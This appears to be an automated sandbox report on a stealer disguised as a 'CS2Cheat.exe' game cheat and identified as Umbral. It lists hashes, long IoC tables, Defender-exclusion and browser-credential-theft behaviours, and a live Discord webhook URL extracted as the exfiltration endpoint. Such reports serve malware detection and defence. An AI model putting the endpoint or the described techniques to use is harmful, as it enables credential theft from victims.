umbral | a9b604c34a849e743d65ee178e52090824b6220b806db53c50df8901e1fc7658

Analysis

max time kernel
19s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 06:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CS2Cheat.exe
Size

5.7MB
MD5

920f3ec2a3fe3557e067f5cef16235f8
SHA1

30a82dc93b0d235d618f44a94bcd092791821912
SHA256

bd0976acd920ba7eedaad30f8834062856da10b46bf6c8ad9312fb3fdacddb8e
SHA512

0fc2e8ee35c4e56efc1bfded2803474881b3b29d4b01c80a600aff36a002a63108fa6e200100e0e1866ce58fd3040188949f00968802430d4e9f9e5c1eced681
SSDEEP

98304:SBfkDxFCuc+TThUj1lmFHKDWKkcdwYCQ0HGrDfEWOGa5YZUI692IWOgCheFezwjz:SRkzbc+vOjzpW27CzED8WiAV6Il8eZjz

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1299080733079375894/hrEkdZRiNfD_2CydV4FCra9Yr1O879zBhe-K5U4ievQAChYclaabDINuCDCfyjlfFnOg

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Umbral1.exe	family_umbral
behavioral1/memory/2420-13-0x0000021C30280000-0x0000021C302C0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2616	powershell.exe
1468	powershell.exe
4496
3152
3664
3472
1136
660	powershell.exe
5032
4692
4268
1128
2480
3040
2392	powershell.exe
3672	powershell.exe
4656	powershell.exe
3000	powershell.exe
3280	powershell.exe
4628	powershell.exe
1696
4964
2104
4436	powershell.exe
1464
3332
4904
212
3040	powershell.exe
4180
2692
5048	powershell.exe
3124
4948
3416
1684	powershell.exe
3544	powershell.exe
3668	powershell.exe
4916	powershell.exe
4216
3016
1656
3792
4612
3612	powershell.exe
1656	powershell.exe
4916	powershell.exe
4700	powershell.exe
1216	powershell.exe
3436
1472
776	powershell.exe
4536	powershell.exe
3704
3736
2264
4600	powershell.exe
4516	powershell.exe
960	powershell.exe
4948
3548
4628	powershell.exe
4440
3248

Drops file in Drivers directory 3 IoCs

Processes:

Umbral1.exeUmbral1.exeUmbral1.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral1.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral1.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral1.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	CS2Cheat.exe

Executes dropped EXE 64 IoCs

Processes:

CS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeUmbral1.exe

pid	process
1684	CS2Cheat.exe
2420	Umbral1.exe
3192	CS2Cheat.exe
2716	Umbral1.exe
2292	CS2Cheat.exe
4136	Umbral1.exe
3676	CS2Cheat.exe
4260	Umbral1.exe
1484	CS2Cheat.exe
2236	Umbral1.exe
5036	CS2Cheat.exe
2984	Umbral1.exe
2396	CS2Cheat.exe
2732	Umbral1.exe
4220	CS2Cheat.exe
4912	Umbral1.exe
2660	CS2Cheat.exe
2232	Umbral1.exe
2972	CS2Cheat.exe
1852	Umbral1.exe
5032	CS2Cheat.exe
4336	Umbral1.exe
4536	CS2Cheat.exe
3560	Umbral1.exe
2116	CS2Cheat.exe
3120	Umbral1.exe
3260	CS2Cheat.exe
4244	Umbral1.exe
4852	CS2Cheat.exe
5080	Umbral1.exe
2888	CS2Cheat.exe
2208	Umbral1.exe
4624	CS2Cheat.exe
3700	Umbral1.exe
4140	CS2Cheat.exe
4076	Umbral1.exe
3960	CS2Cheat.exe
1472	Umbral1.exe
64	CS2Cheat.exe
1388	Umbral1.exe
4936	CS2Cheat.exe
4160	Umbral1.exe
4244	CS2Cheat.exe
776	Umbral1.exe
2736	CS2Cheat.exe
4700	Umbral1.exe
384	CS2Cheat.exe
1460	Umbral1.exe
1452	CS2Cheat.exe
4216	Umbral1.exe
2600	CS2Cheat.exe
1248	Umbral1.exe
720	CS2Cheat.exe
2196	Umbral1.exe
632	CS2Cheat.exe
3208	Umbral1.exe
4540	CS2Cheat.exe
2256	Umbral1.exe
4056	CS2Cheat.exe
2944	Umbral1.exe
1812	CS2Cheat.exe
3676	Umbral1.exe
2116	CS2Cheat.exe
4440	Umbral1.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 50 IoCs

Web Service

T1102

Processes:

flow	ioc
154	discord.com
171	discord.com
183	discord.com
202	discord.com
39	discord.com
50	discord.com
105	discord.com
104	discord.com
143	discord.com
155	discord.com
189	discord.com
25	discord.com
86	discord.com
92	discord.com
201	discord.com
40	discord.com
57	discord.com
99	discord.com
111	discord.com
128	discord.com
129	discord.com
136	discord.com
142	discord.com
49	discord.com
65	discord.com
98	discord.com
162	discord.com
177	discord.com
172	discord.com
184	discord.com
195	discord.com
196	discord.com
213	discord.com
58	discord.com
119	discord.com
149	discord.com
163	discord.com
208	discord.com
214	discord.com
26	discord.com
64	discord.com
137	discord.com
207	discord.com
87	discord.com
93	discord.com
178	discord.com
190	discord.com
112	discord.com
120	discord.com
148	discord.com

Looks up external IP address via web service 25 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
140	ip-api.com
169	ip-api.com
175	ip-api.com
181	ip-api.com
187	ip-api.com
37	ip-api.com
102	ip-api.com
134	ip-api.com
199	ip-api.com
211	ip-api.com
55	ip-api.com
83	ip-api.com
115	ip-api.com
126	ip-api.com
146	ip-api.com
152	ip-api.com
193	ip-api.com
205	ip-api.com
22	ip-api.com
47	ip-api.com
90	ip-api.com
160	ip-api.com
62	ip-api.com
96	ip-api.com
109	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CS2Cheat.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 50 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXEPING.EXEcmd.exePING.EXEcmd.exePING.EXEPING.EXEcmd.exePING.EXEcmd.exePING.EXEcmd.execmd.execmd.exePING.EXEcmd.exePING.EXEcmd.exePING.EXE

pid	process
2556	cmd.exe
4680	PING.EXE
4400
1512
4428
1936	PING.EXE
1400	cmd.exe
1452	PING.EXE
4268
3688
3192
2236	cmd.exe
4160	PING.EXE
2308
4932
2892
4912
4416
3940	PING.EXE
2116	cmd.exe
428	PING.EXE
3276
680
1576
1468
3924	cmd.exe
768
1060
2344
720
2856
2576
4056	PING.EXE
996
3196
4420	cmd.exe
2944	cmd.exe
1868
4056
2992
4700	cmd.exe
3220	PING.EXE
1716	cmd.exe
868
1396
2940
1120
364	PING.EXE
3512	cmd.exe
3096	PING.EXE

Detects videocard installed 1 TTPs 25 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exewmic.exe

pid	process
5012	wmic.exe
1884
4628
4388
1712
1636
2992	wmic.exe
4060	wmic.exe
3708	wmic.exe
4628	wmic.exe
1452
3444
5112
4092
3672	wmic.exe
2760	wmic.exe
3208
4160
2756
2760	wmic.exe
1060	wmic.exe
1000	wmic.exe
1444
2552
4252

Runs ping.exe 1 TTPs 25 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
3096	PING.EXE
4680	PING.EXE
4160	PING.EXE
1396
2992
680
720
3220	PING.EXE
1468
1936	PING.EXE
1452	PING.EXE
768
4268
3192
3940	PING.EXE
4056
2308
2576
4056	PING.EXE
428	PING.EXE
4400
1060
4428
4912
364	PING.EXE

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

pid	process
2392	powershell.exe
2392	powershell.exe
4600	powershell.exe
4600	powershell.exe
4916	powershell.exe
4916	powershell.exe
3896	powershell.exe
3896	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
3544	powershell.exe
3544	powershell.exe
3544	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
1216	powershell.exe
1216	powershell.exe
1216	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
3612	powershell.exe
3612	powershell.exe
3612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Umbral1.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2420	Umbral1.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	1620	wmic.exe
Token: SeSecurityPrivilege	1620	wmic.exe
Token: SeTakeOwnershipPrivilege	1620	wmic.exe
Token: SeLoadDriverPrivilege	1620	wmic.exe
Token: SeSystemProfilePrivilege	1620	wmic.exe
Token: SeSystemtimePrivilege	1620	wmic.exe
Token: SeProfSingleProcessPrivilege	1620	wmic.exe
Token: SeIncBasePriorityPrivilege	1620	wmic.exe
Token: SeCreatePagefilePrivilege	1620	wmic.exe
Token: SeBackupPrivilege	1620	wmic.exe
Token: SeRestorePrivilege	1620	wmic.exe
Token: SeShutdownPrivilege	1620	wmic.exe
Token: SeDebugPrivilege	1620	wmic.exe
Token: SeSystemEnvironmentPrivilege	1620	wmic.exe
Token: SeRemoteShutdownPrivilege	1620	wmic.exe
Token: SeUndockPrivilege	1620	wmic.exe
Token: SeManageVolumePrivilege	1620	wmic.exe
Token: 33	1620	wmic.exe
Token: 34	1620	wmic.exe
Token: 35	1620	wmic.exe
Token: 36	1620	wmic.exe
Token: SeIncreaseQuotaPrivilege	1620	wmic.exe
Token: SeSecurityPrivilege	1620	wmic.exe
Token: SeTakeOwnershipPrivilege	1620	wmic.exe
Token: SeLoadDriverPrivilege	1620	wmic.exe
Token: SeSystemProfilePrivilege	1620	wmic.exe
Token: SeSystemtimePrivilege	1620	wmic.exe
Token: SeProfSingleProcessPrivilege	1620	wmic.exe
Token: SeIncBasePriorityPrivilege	1620	wmic.exe
Token: SeCreatePagefilePrivilege	1620	wmic.exe
Token: SeBackupPrivilege	1620	wmic.exe
